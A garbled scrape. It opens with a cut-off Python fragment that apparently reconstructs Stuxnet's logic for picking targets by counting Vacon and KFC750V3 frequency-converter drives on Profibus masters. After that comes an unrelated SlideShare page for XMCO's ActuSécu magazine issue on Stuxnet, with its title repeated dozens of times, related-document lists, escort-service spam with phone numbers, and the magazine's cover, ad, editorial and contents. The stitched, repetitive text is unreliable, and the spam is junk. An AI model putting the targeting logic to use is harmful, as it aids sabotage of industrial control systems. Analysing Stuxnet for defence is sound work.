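        if len(msg) == RECORDS_PER_MESSAGE * size:
            return [msg[i:i + size] for i in range(0, len(msg), size)]
    raise ValueError(f"unexpected DP_RECV message length {len(msg)}")


def sample_inventory(vacon: int, fararo: int, other: int = 0) -> List[Drive]:
    """Constructed inventory: spread the requested drives over the masters
    round-robin so that no master exceeds 31 slaves."""
    idents = ([IDENT_VACON_NX] * vacon + [IDENT_KFC750V3] * fararo
              + [0x0000] * other)          # 0x0000: placeholder for any other model
    return [Drive(master=i % MAX_MASTERS, ident=ident)
            for i, ident in enumerate(idents)]


if __name__ == "__main__":
    for vacon, fararo in ((20, 15), (10, 25), (20, 12)):
        seq = select_sequence(sample_inventory(vacon, fararo))
        print(f"{vacon} Vacon NX + {fararo} KFC750V3 -> sequence {seq}")
    records = split_dp_recv_message(bytes(RECORDS_PER_MESSAGE * 28))
    print(f"{len(records)} records of {len(records[0])} bytes")
```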
Stuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realities
Stuxnet. analysis, myths, realities

Weitere ähnliche Inhalte

Ähnlich wie Stuxnet. analysis, myths, realities

Global threat-landscape report by fortinet.
Global threat-landscape report by fortinet.Global threat-landscape report by fortinet.
Global threat-landscape report by fortinet.Reham Maher El-Safarini
 
The difference between a duck
The difference between a duckThe difference between a duck
The difference between a duckSensePost
 
NXP'S-PORTFOLIO-FOR-ADDRESSING-IOT-SECURITY.pdf
NXP'S-PORTFOLIO-FOR-ADDRESSING-IOT-SECURITY.pdfNXP'S-PORTFOLIO-FOR-ADDRESSING-IOT-SECURITY.pdf
NXP'S-PORTFOLIO-FOR-ADDRESSING-IOT-SECURITY.pdfssuser57b3e5
 
Spanish1.jpgSpanish2.jpgSpanish3.jpgSpanish4.jpg.docx
Spanish1.jpgSpanish2.jpgSpanish3.jpgSpanish4.jpg.docxSpanish1.jpgSpanish2.jpgSpanish3.jpgSpanish4.jpg.docx
Spanish1.jpgSpanish2.jpgSpanish3.jpgSpanish4.jpg.docxrafbolet0
 
Foundational Elements for IoT (1)
Foundational Elements for IoT (1)Foundational Elements for IoT (1)
Foundational Elements for IoT (1)Nicolas Delorme
 
Whitepaper | Network Security - How to defend your Plant against the threats ...
Whitepaper | Network Security - How to defend your Plant against the threats ...Whitepaper | Network Security - How to defend your Plant against the threats ...
Whitepaper | Network Security - How to defend your Plant against the threats ...Yokogawa
 
Embedded c programming guide e book atmel 8051 / 89c51 /89c52
Embedded c programming guide e book atmel 8051 / 89c51 /89c52Embedded c programming guide e book atmel 8051 / 89c51 /89c52
Embedded c programming guide e book atmel 8051 / 89c51 /89c52Raghav Shetty
 
Information Security - A Discussion
Information Security  - A DiscussionInformation Security  - A Discussion
Information Security - A DiscussionKaushik Patra
 
The EternalBlue Exploit: how it works and affects systems
The EternalBlue Exploit: how it works and affects systemsThe EternalBlue Exploit: how it works and affects systems
The EternalBlue Exploit: how it works and affects systemsAndrea Bissoli
 
TECTECO V3.20160526.key (2)
TECTECO V3.20160526.key (2)TECTECO V3.20160526.key (2)
TECTECO V3.20160526.key (2)Mark De Simone
 
IzPack - fOSSa 2009
IzPack - fOSSa 2009IzPack - fOSSa 2009
IzPack - fOSSa 2009julien.ponge
 
Quality of Information and Malware by Ashok Panwar
Quality of Information and Malware by Ashok PanwarQuality of Information and Malware by Ashok Panwar
Quality of Information and Malware by Ashok PanwarAshok Panwar
 
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...DefCamp
 
The top 10 web application intrusion techniques
The top 10 web application intrusion techniquesThe top 10 web application intrusion techniques
The top 10 web application intrusion techniquesAntonio Fontes
 
Smau Bologna 2013 Stefano Zanero
Smau Bologna 2013 Stefano ZaneroSmau Bologna 2013 Stefano Zanero
Smau Bologna 2013 Stefano ZaneroSMAU
 
Show and Tell (with notes)
Show and Tell (with notes)Show and Tell (with notes)
Show and Tell (with notes)Tom Jenkins
 

Ähnlich wie Stuxnet. analysis, myths, realities (20)

Global threat-landscape report by fortinet.
Global threat-landscape report by fortinet.Global threat-landscape report by fortinet.
Global threat-landscape report by fortinet.
 
The difference between a duck
The difference between a duckThe difference between a duck
The difference between a duck
 
NXP'S-PORTFOLIO-FOR-ADDRESSING-IOT-SECURITY.pdf
NXP'S-PORTFOLIO-FOR-ADDRESSING-IOT-SECURITY.pdfNXP'S-PORTFOLIO-FOR-ADDRESSING-IOT-SECURITY.pdf
NXP'S-PORTFOLIO-FOR-ADDRESSING-IOT-SECURITY.pdf
 
Spanish1.jpgSpanish2.jpgSpanish3.jpgSpanish4.jpg.docx
Spanish1.jpgSpanish2.jpgSpanish3.jpgSpanish4.jpg.docxSpanish1.jpgSpanish2.jpgSpanish3.jpgSpanish4.jpg.docx
Spanish1.jpgSpanish2.jpgSpanish3.jpgSpanish4.jpg.docx
 
Foundational Elements for IoT (1)
Foundational Elements for IoT (1)Foundational Elements for IoT (1)
Foundational Elements for IoT (1)
 
Whitepaper | Network Security - How to defend your Plant against the threats ...
Whitepaper | Network Security - How to defend your Plant against the threats ...Whitepaper | Network Security - How to defend your Plant against the threats ...
Whitepaper | Network Security - How to defend your Plant against the threats ...
 
Userland Hooking in Windows
Userland Hooking in WindowsUserland Hooking in Windows
Userland Hooking in Windows
 
Embedded c programming guide e book atmel 8051 / 89c51 /89c52
Embedded c programming guide e book atmel 8051 / 89c51 /89c52Embedded c programming guide e book atmel 8051 / 89c51 /89c52
Embedded c programming guide e book atmel 8051 / 89c51 /89c52
 
Mega & micro technology trends
Mega & micro technology trendsMega & micro technology trends
Mega & micro technology trends
 
Information Security - A Discussion
Information Security  - A DiscussionInformation Security  - A Discussion
Information Security - A Discussion
 
The EternalBlue Exploit: how it works and affects systems
The EternalBlue Exploit: how it works and affects systemsThe EternalBlue Exploit: how it works and affects systems
The EternalBlue Exploit: how it works and affects systems
 
TECTECO V3.20160526.key (2)
TECTECO V3.20160526.key (2)TECTECO V3.20160526.key (2)
TECTECO V3.20160526.key (2)
 
IzPack - fOSSa 2009
IzPack - fOSSa 2009IzPack - fOSSa 2009
IzPack - fOSSa 2009
 
Ms quiz
Ms quizMs quiz
Ms quiz
 
Quality of Information and Malware by Ashok Panwar
Quality of Information and Malware by Ashok PanwarQuality of Information and Malware by Ashok Panwar
Quality of Information and Malware by Ashok Panwar
 
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
 
Duqu: il nuovo Stuxnet?
Duqu: il nuovo Stuxnet?Duqu: il nuovo Stuxnet?
Duqu: il nuovo Stuxnet?
 
The top 10 web application intrusion techniques
The top 10 web application intrusion techniquesThe top 10 web application intrusion techniques
The top 10 web application intrusion techniques
 
Smau Bologna 2013 Stefano Zanero
Smau Bologna 2013 Stefano ZaneroSmau Bologna 2013 Stefano Zanero
Smau Bologna 2013 Stefano Zanero
 
Show and Tell (with notes)
Show and Tell (with notes)Show and Tell (with notes)
Show and Tell (with notes)
 

Mehr von Yury Chemerkin

Security Vulnerability Notice SE-2012-01-PUBLIC [Security vulnerabilities in ...
Security Vulnerability Notice SE-2012-01-PUBLIC [Security vulnerabilities in ...Security Vulnerability Notice SE-2012-01-PUBLIC [Security vulnerabilities in ...
Security Vulnerability Notice SE-2012-01-PUBLIC [Security vulnerabilities in ...Yury Chemerkin
 
Red october. detailed malware description
Red october. detailed malware descriptionRed october. detailed malware description
Red october. detailed malware descriptionYury Chemerkin
 
Comment crew indicators of compromise
Comment crew indicators of compromiseComment crew indicators of compromise
Comment crew indicators of compromiseYury Chemerkin
 
Appendix g iocs readme
Appendix g iocs readmeAppendix g iocs readme
Appendix g iocs readmeYury Chemerkin
 
Appendix f (digital) ssl certificates
Appendix f (digital)   ssl certificatesAppendix f (digital)   ssl certificates
Appendix f (digital) ssl certificatesYury Chemerkin
 
Appendix e (digital) md5s
Appendix e (digital)   md5sAppendix e (digital)   md5s
Appendix e (digital) md5sYury Chemerkin
 
Appendix d (digital) fqd ns
Appendix d (digital)   fqd nsAppendix d (digital)   fqd ns
Appendix d (digital) fqd nsYury Chemerkin
 
6071f3f4 40e6-4c7b-8868-3b0b21a9f601
6071f3f4 40e6-4c7b-8868-3b0b21a9f6016071f3f4 40e6-4c7b-8868-3b0b21a9f601
6071f3f4 40e6-4c7b-8868-3b0b21a9f601Yury Chemerkin
 
Zane lackey. security at scale. web application security in a continuous depl...
Zane lackey. security at scale. web application security in a continuous depl...Zane lackey. security at scale. web application security in a continuous depl...
Zane lackey. security at scale. web application security in a continuous depl...Yury Chemerkin
 
Windows 8. important considerations for computer forensics and electronic dis...
Windows 8. important considerations for computer forensics and electronic dis...Windows 8. important considerations for computer forensics and electronic dis...
Windows 8. important considerations for computer forensics and electronic dis...Yury Chemerkin
 
The stuxnet computer worm. harbinger of an emerging warfare capability
The stuxnet computer worm. harbinger of an emerging warfare capabilityThe stuxnet computer worm. harbinger of an emerging warfare capability
The stuxnet computer worm. harbinger of an emerging warfare capabilityYury Chemerkin
 
Stuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learnedStuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learnedYury Chemerkin
 
Sophos ransom ware fake antivirus
Sophos ransom ware fake antivirusSophos ransom ware fake antivirus
Sophos ransom ware fake antivirusYury Chemerkin
 
Six months later – a report card on google’s demotion of pirate sites
Six months later – a report card on google’s demotion of pirate sitesSix months later – a report card on google’s demotion of pirate sites
Six months later – a report card on google’s demotion of pirate sitesYury Chemerkin
 
Security in the cloud planning guide
Security in the cloud planning guideSecurity in the cloud planning guide
Security in the cloud planning guideYury Chemerkin
 
Security configuration recommendations for apple i os 5 devices
Security configuration recommendations for apple i os 5 devicesSecurity configuration recommendations for apple i os 5 devices
Security configuration recommendations for apple i os 5 devicesYury Chemerkin
 
Render man. hacker + airplanes = no good can come of this
Render man. hacker + airplanes = no good can come of thisRender man. hacker + airplanes = no good can come of this
Render man. hacker + airplanes = no good can come of thisYury Chemerkin
 
Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...Yury Chemerkin
 

Mehr von Yury Chemerkin (20)

Security Vulnerability Notice SE-2012-01-PUBLIC [Security vulnerabilities in ...
Security Vulnerability Notice SE-2012-01-PUBLIC [Security vulnerabilities in ...Security Vulnerability Notice SE-2012-01-PUBLIC [Security vulnerabilities in ...
Security Vulnerability Notice SE-2012-01-PUBLIC [Security vulnerabilities in ...
 
Red october. detailed malware description
Red october. detailed malware descriptionRed october. detailed malware description
Red october. detailed malware description
 
Comment crew indicators of compromise
Comment crew indicators of compromiseComment crew indicators of compromise
Comment crew indicators of compromise
 
Appendix g iocs readme
Appendix g iocs readmeAppendix g iocs readme
Appendix g iocs readme
 
Appendix f (digital) ssl certificates
Appendix f (digital)   ssl certificatesAppendix f (digital)   ssl certificates
Appendix f (digital) ssl certificates
 
Appendix e (digital) md5s
Appendix e (digital)   md5sAppendix e (digital)   md5s
Appendix e (digital) md5s
 
Appendix d (digital) fqd ns
Appendix d (digital)   fqd nsAppendix d (digital)   fqd ns
Appendix d (digital) fqd ns
 
6071f3f4 40e6-4c7b-8868-3b0b21a9f601
6071f3f4 40e6-4c7b-8868-3b0b21a9f6016071f3f4 40e6-4c7b-8868-3b0b21a9f601
6071f3f4 40e6-4c7b-8868-3b0b21a9f601
 
Jp3 13
Jp3 13Jp3 13
Jp3 13
 
Zane lackey. security at scale. web application security in a continuous depl...
Zane lackey. security at scale. web application security in a continuous depl...Zane lackey. security at scale. web application security in a continuous depl...
Zane lackey. security at scale. web application security in a continuous depl...
 
Windows 8. important considerations for computer forensics and electronic dis...
Windows 8. important considerations for computer forensics and electronic dis...Windows 8. important considerations for computer forensics and electronic dis...
Windows 8. important considerations for computer forensics and electronic dis...
 
The stuxnet computer worm. harbinger of an emerging warfare capability
The stuxnet computer worm. harbinger of an emerging warfare capabilityThe stuxnet computer worm. harbinger of an emerging warfare capability
The stuxnet computer worm. harbinger of an emerging warfare capability
 
Stuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learnedStuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learned
 
Sophos ransom ware fake antivirus
Sophos ransom ware fake antivirusSophos ransom ware fake antivirus
Sophos ransom ware fake antivirus
 
Six months later – a report card on google’s demotion of pirate sites
Six months later – a report card on google’s demotion of pirate sitesSix months later – a report card on google’s demotion of pirate sites
Six months later – a report card on google’s demotion of pirate sites
 
Security in the cloud planning guide
Security in the cloud planning guideSecurity in the cloud planning guide
Security in the cloud planning guide
 
Security configuration recommendations for apple i os 5 devices
Security configuration recommendations for apple i os 5 devicesSecurity configuration recommendations for apple i os 5 devices
Security configuration recommendations for apple i os 5 devices
 
Render man. hacker + airplanes = no good can come of this
Render man. hacker + airplanes = no good can come of thisRender man. hacker + airplanes = no good can come of this
Render man. hacker + airplanes = no good can come of this
 
Msft oracle brief
Msft oracle briefMsft oracle brief
Msft oracle brief
 
Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...
 

Kürzlich hochgeladen

Hyundai World Rally Team in action at 2024 WRC
Hyundai World Rally Team in action at 2024 WRCHyundai World Rally Team in action at 2024 WRC
Hyundai World Rally Team in action at 2024 WRCHyundai Motor Group
 
Delhi Call Girls East Of Kailash 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls East Of Kailash 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip CallDelhi Call Girls East Of Kailash 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls East Of Kailash 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Callshivangimorya083
 
Production documentary.ppt. x
Production documentary.ppt.               xProduction documentary.ppt.               x
Production documentary.ppt. x21005760
 
如何办理美国西雅图大学毕业证(Seattle毕业证书)成绩单(学位证)原版一比一
如何办理美国西雅图大学毕业证(Seattle毕业证书)成绩单(学位证)原版一比一如何办理美国西雅图大学毕业证(Seattle毕业证书)成绩单(学位证)原版一比一
如何办理美国西雅图大学毕业证(Seattle毕业证书)成绩单(学位证)原版一比一meq5nzfnk
 
Greenery-Palette Pitch Deck by Slidesgo.pptx
Greenery-Palette Pitch Deck by Slidesgo.pptxGreenery-Palette Pitch Deck by Slidesgo.pptx
Greenery-Palette Pitch Deck by Slidesgo.pptxzohiiimughal286
 
John Deere 7430 7530 Tractors Diagnostic Service Manual W.pdf
John Deere 7430 7530 Tractors Diagnostic Service Manual W.pdfJohn Deere 7430 7530 Tractors Diagnostic Service Manual W.pdf
John Deere 7430 7530 Tractors Diagnostic Service Manual W.pdfExcavator
 
Sales & Marketing Alignment_ How to Synergize for Success.pptx.pdf
Sales & Marketing Alignment_ How to Synergize for Success.pptx.pdfSales & Marketing Alignment_ How to Synergize for Success.pptx.pdf
Sales & Marketing Alignment_ How to Synergize for Success.pptx.pdfAggregage
 
Delhi Call Girls Saket 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Saket 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip CallDelhi Call Girls Saket 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Saket 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Callshivangimorya083
 
Vip Hot🥵 Call Girls Delhi Delhi {9711199012} Avni Thakur 🧡😘 High Profile Girls
Vip Hot🥵 Call Girls Delhi Delhi {9711199012} Avni Thakur 🧡😘 High Profile GirlsVip Hot🥵 Call Girls Delhi Delhi {9711199012} Avni Thakur 🧡😘 High Profile Girls
Vip Hot🥵 Call Girls Delhi Delhi {9711199012} Avni Thakur 🧡😘 High Profile Girlsshivangimorya083
 
Vip Mumbai Call Girls Mumbai Call On 9920725232 With Body to body massage wit...
Vip Mumbai Call Girls Mumbai Call On 9920725232 With Body to body massage wit...Vip Mumbai Call Girls Mumbai Call On 9920725232 With Body to body massage wit...
Vip Mumbai Call Girls Mumbai Call On 9920725232 With Body to body massage wit...amitlee9823
 
Russian Call Girls Delhi Indirapuram {9711199171} Aarvi Gupta ✌️Independent ...
Russian  Call Girls Delhi Indirapuram {9711199171} Aarvi Gupta ✌️Independent ...Russian  Call Girls Delhi Indirapuram {9711199171} Aarvi Gupta ✌️Independent ...
Russian Call Girls Delhi Indirapuram {9711199171} Aarvi Gupta ✌️Independent ...shivangimorya083
 
Delhi Call Girls Vikaspuri 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Vikaspuri 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip CallDelhi Call Girls Vikaspuri 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Vikaspuri 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Callshivangimorya083
 
Innovating Manufacturing with CNC Technology
Innovating Manufacturing with CNC TechnologyInnovating Manufacturing with CNC Technology
Innovating Manufacturing with CNC Technologyquickpartslimitlessm
 
Call Girls in Malviya Nagar Delhi 💯 Call Us 🔝9205541914 🔝( Delhi) Escorts Ser...
Call Girls in Malviya Nagar Delhi 💯 Call Us 🔝9205541914 🔝( Delhi) Escorts Ser...Call Girls in Malviya Nagar Delhi 💯 Call Us 🔝9205541914 🔝( Delhi) Escorts Ser...
Call Girls in Malviya Nagar Delhi 💯 Call Us 🔝9205541914 🔝( Delhi) Escorts Ser...Delhi Call girls
 
(COD) ̄Young Call Girls In Dwarka , New Delhi꧁❤ 7042364481❤꧂ Escorts Service i...
(COD) ̄Young Call Girls In Dwarka , New Delhi꧁❤ 7042364481❤꧂ Escorts Service i...(COD) ̄Young Call Girls In Dwarka , New Delhi꧁❤ 7042364481❤꧂ Escorts Service i...
(COD) ̄Young Call Girls In Dwarka , New Delhi꧁❤ 7042364481❤꧂ Escorts Service i...Hot Call Girls In Sector 58 (Noida)
 
Chapter-1.3-Four-Basic-Computer-periods.pptx
Chapter-1.3-Four-Basic-Computer-periods.pptxChapter-1.3-Four-Basic-Computer-periods.pptx
Chapter-1.3-Four-Basic-Computer-periods.pptxAnjieVillarba1
 
Hot Modals Call Girls (Delhi) Dwarka9711199171✔️ High Class Service 100% Saf...
Hot Modals Call Girls (Delhi) Dwarka9711199171✔️ High Class  Service 100% Saf...Hot Modals Call Girls (Delhi) Dwarka9711199171✔️ High Class  Service 100% Saf...
Hot Modals Call Girls (Delhi) Dwarka9711199171✔️ High Class Service 100% Saf...shivangimorya083
 

Kürzlich hochgeladen (20)

Hyundai World Rally Team in action at 2024 WRC
Hyundai World Rally Team in action at 2024 WRCHyundai World Rally Team in action at 2024 WRC
Hyundai World Rally Team in action at 2024 WRC
 
Delhi Call Girls East Of Kailash 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls East Of Kailash 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip CallDelhi Call Girls East Of Kailash 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls East Of Kailash 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
 
Production documentary.ppt. x
Production documentary.ppt.               xProduction documentary.ppt.               x
Production documentary.ppt. x
 
如何办理美国西雅图大学毕业证(Seattle毕业证书)成绩单(学位证)原版一比一
如何办理美国西雅图大学毕业证(Seattle毕业证书)成绩单(学位证)原版一比一如何办理美国西雅图大学毕业证(Seattle毕业证书)成绩单(学位证)原版一比一
如何办理美国西雅图大学毕业证(Seattle毕业证书)成绩单(学位证)原版一比一
 
Greenery-Palette Pitch Deck by Slidesgo.pptx
Greenery-Palette Pitch Deck by Slidesgo.pptxGreenery-Palette Pitch Deck by Slidesgo.pptx
Greenery-Palette Pitch Deck by Slidesgo.pptx
 
John Deere 7430 7530 Tractors Diagnostic Service Manual W.pdf
John Deere 7430 7530 Tractors Diagnostic Service Manual W.pdfJohn Deere 7430 7530 Tractors Diagnostic Service Manual W.pdf
John Deere 7430 7530 Tractors Diagnostic Service Manual W.pdf
 
Sales & Marketing Alignment_ How to Synergize for Success.pptx.pdf
Sales & Marketing Alignment_ How to Synergize for Success.pptx.pdfSales & Marketing Alignment_ How to Synergize for Success.pptx.pdf
Sales & Marketing Alignment_ How to Synergize for Success.pptx.pdf
 
Delhi Call Girls Saket 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Saket 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip CallDelhi Call Girls Saket 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Saket 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
 
Vip Hot🥵 Call Girls Delhi Delhi {9711199012} Avni Thakur 🧡😘 High Profile Girls
Vip Hot🥵 Call Girls Delhi Delhi {9711199012} Avni Thakur 🧡😘 High Profile GirlsVip Hot🥵 Call Girls Delhi Delhi {9711199012} Avni Thakur 🧡😘 High Profile Girls
Vip Hot🥵 Call Girls Delhi Delhi {9711199012} Avni Thakur 🧡😘 High Profile Girls
 
Call Girls In Kirti Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
Call Girls In Kirti Nagar 📱  9999965857  🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICECall Girls In Kirti Nagar 📱  9999965857  🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
Call Girls In Kirti Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SERVICE
 
Call Girls in Shri Niwas Puri Delhi 💯Call Us 🔝9953056974🔝
Call Girls in  Shri Niwas Puri  Delhi 💯Call Us 🔝9953056974🔝Call Girls in  Shri Niwas Puri  Delhi 💯Call Us 🔝9953056974🔝
Call Girls in Shri Niwas Puri Delhi 💯Call Us 🔝9953056974🔝
 
Vip Mumbai Call Girls Mumbai Call On 9920725232 With Body to body massage wit...
Vip Mumbai Call Girls Mumbai Call On 9920725232 With Body to body massage wit...Vip Mumbai Call Girls Mumbai Call On 9920725232 With Body to body massage wit...
Vip Mumbai Call Girls Mumbai Call On 9920725232 With Body to body massage wit...
 
Russian Call Girls Delhi Indirapuram {9711199171} Aarvi Gupta ✌️Independent ...
Russian  Call Girls Delhi Indirapuram {9711199171} Aarvi Gupta ✌️Independent ...Russian  Call Girls Delhi Indirapuram {9711199171} Aarvi Gupta ✌️Independent ...
Russian Call Girls Delhi Indirapuram {9711199171} Aarvi Gupta ✌️Independent ...
 
Delhi Call Girls Vikaspuri 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Vikaspuri 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip CallDelhi Call Girls Vikaspuri 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Vikaspuri 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
 
Innovating Manufacturing with CNC Technology
Innovating Manufacturing with CNC TechnologyInnovating Manufacturing with CNC Technology
Innovating Manufacturing with CNC Technology
 
Call Girls In Kirti Nagar 7042364481 Escort Service 24x7 Delhi
Call Girls In Kirti Nagar 7042364481 Escort Service 24x7 DelhiCall Girls In Kirti Nagar 7042364481 Escort Service 24x7 Delhi
Call Girls In Kirti Nagar 7042364481 Escort Service 24x7 Delhi
 
Call Girls in Malviya Nagar Delhi 💯 Call Us 🔝9205541914 🔝( Delhi) Escorts Ser...
Call Girls in Malviya Nagar Delhi 💯 Call Us 🔝9205541914 🔝( Delhi) Escorts Ser...Call Girls in Malviya Nagar Delhi 💯 Call Us 🔝9205541914 🔝( Delhi) Escorts Ser...
Call Girls in Malviya Nagar Delhi 💯 Call Us 🔝9205541914 🔝( Delhi) Escorts Ser...
 
(COD) ̄Young Call Girls In Dwarka , New Delhi꧁❤ 7042364481❤꧂ Escorts Service i...
(COD) ̄Young Call Girls In Dwarka , New Delhi꧁❤ 7042364481❤꧂ Escorts Service i...(COD) ̄Young Call Girls In Dwarka , New Delhi꧁❤ 7042364481❤꧂ Escorts Service i...
(COD) ̄Young Call Girls In Dwarka , New Delhi꧁❤ 7042364481❤꧂ Escorts Service i...
 
Chapter-1.3-Four-Basic-Computer-periods.pptx
Chapter-1.3-Four-Basic-Computer-periods.pptxChapter-1.3-Four-Basic-Computer-periods.pptx
Chapter-1.3-Four-Basic-Computer-periods.pptx
 
Hot Modals Call Girls (Delhi) Dwarka9711199171✔️ High Class Service 100% Saf...
Hot Modals Call Girls (Delhi) Dwarka9711199171✔️ High Class  Service 100% Saf...Hot Modals Call Girls (Delhi) Dwarka9711199171✔️ High Class  Service 100% Saf...
Hot Modals Call Girls (Delhi) Dwarka9711199171✔️ High Class Service 100% Saf...
 

Stuxnet. analysis, myths, realities

  • 1. ACTUSÉCU 27 XMCO David Helan S ND REALITIE IS, MYTHS A  : ANALYS STUXNET C ON TEN TS S t u x n et : c om p l e te two-p a rt ar t icle o n T HE vir us o f 2010 K ey b o ard L ayo u t : a n a l ysi s of t he MS10-073 vulner abilit y used by St ux ne t C u r re n t n e w s : Top 10 ha c king t echniques, z ero -day IE, Gsdays 2 0 1 0 , P ro FTP D. .. B l o g s , s o f t wares an d o u r fav orite Twe e ts... This document is the property of XMCO Partners. Any reproduction is strictly prohibited. !!!!!!!!!!!!!!!!! [1]
  • 2. ACTU SÉCU 27 A re y o u c o n c e r n e d b y I T s e c u ri t y i n y o u r c o m p a n y ? XMCO Partners is a consultancy whose business is IT security audits. Services: Intrusion tests Our experts in intrusion can test your networks, systems and web applications Use of OWASP, OSSTMM and CCWAPSS technologies Security audit Technical and organizational audit of the security of your Information System Best Practices ISO 27001, PCI DSS, Sarbanes-Oxley PCI DSS support Consulting and auditing for environments requiring PCI DSS Level 1 and 2 certification. CERT-XMCO: Vulnerability monitoring Personalized monitoring of vulnerabilities and the fixes affecting your Information System CERT-XMCO: Response to intrusion Detection and diagnosis of intrusion, collection of evidence, log examination, malware autopsy About XMCO Partners: Founded in 2002 by experts in security and managed by its founders, we work in the form of fixed-fee projects with a commitment to achieve results. Intrusion tests, security audits and vulnerability monitoring are the major areas in which our firm is developing. At the same time, we work with senior management on assignments providing support to heads of information- systems security, in drawing up master plans and in working on awareness-raising seminars with several large French accounts. To contact XMCO Partners and discover our services: http://www.xmco.fr WWW.XMCO.FR This document is the property of XMCO Partners. Any reproduction is strictly prohibited. !!!!!!!!!!!!!!!!! [2]
  • 3. FEB. 2011 EDITORIAL N UMBER 2 7 We wish you a happy 2011… ACTUSECU This is the first issue of ActuSécu certainly be implementation errors in 2011. As usual, a very busy that may be exploited by pirates, year end made us a little late in especially as these are particularly Editor in chief: writing this issue. ingenious concerning hacking Adrien GUINAULT means of payment. The XMCO team is strengthened Contributors: with the arrival of Florent We hope that you find this issue Charles DAGOUAT Hochwelker, a security consultant interesting and we look forward to Florent HOCHWELKER coming from SkyRecon. The seeing you at Black Hat Stéphane JIN security of the Windows kernel, Barcelona, for which XMCO is a François LEGUE DEP bypass and other tricks for partner. Frédéric CHARPENTIER happily causing memory overflows Yannick HAMON no longer hold any secrets for him. Frédéric Charpentier Florent has also written its first Chief Technology Officer article in this issue. CONTACT XMCO What will 2011 bring us in terms of actu_secu@xmco.fr attacks and security? Without info@xmco.fr wishing to gaze into a crystal ball, it is clear, for me, that 2011 will be THE XMCO AGENDA the year of m-payment: contactless mobile payments (by PCI DSS QSA TRAINING NFC or GSM). Although these 7 and 8 March in London technologies are, a priori, new, BLACKHAT EUROPE they are based on existing and 16 and 17 March in Barcelona proven frameworks. There will BLACK HAT This document is the property of XMCO Partners. Any reproduction is strictly prohibited. !!!!!!!!!!!!!!!!! [3]
CONTENTS

Stuxnet Part I: analysis, myths and realities ..... 5
An examination of THE virus of 2010

Stuxnet Part II: technical analysis ..... 13
Propagation, infection and attacks on industrial systems.

Keyboard Layout vulnerability ..... 29
Analysis of the "elevation of privileges" vulnerability used by Stuxnet (MS10-073).

Current news ..... 38
Top Ten hacking techniques, zero-day IE, GS Days, ProFTPD...

Blogs, software and extensions ..... 52
IMA, VMware compliance checker, Twitter and the rn_101 blog.
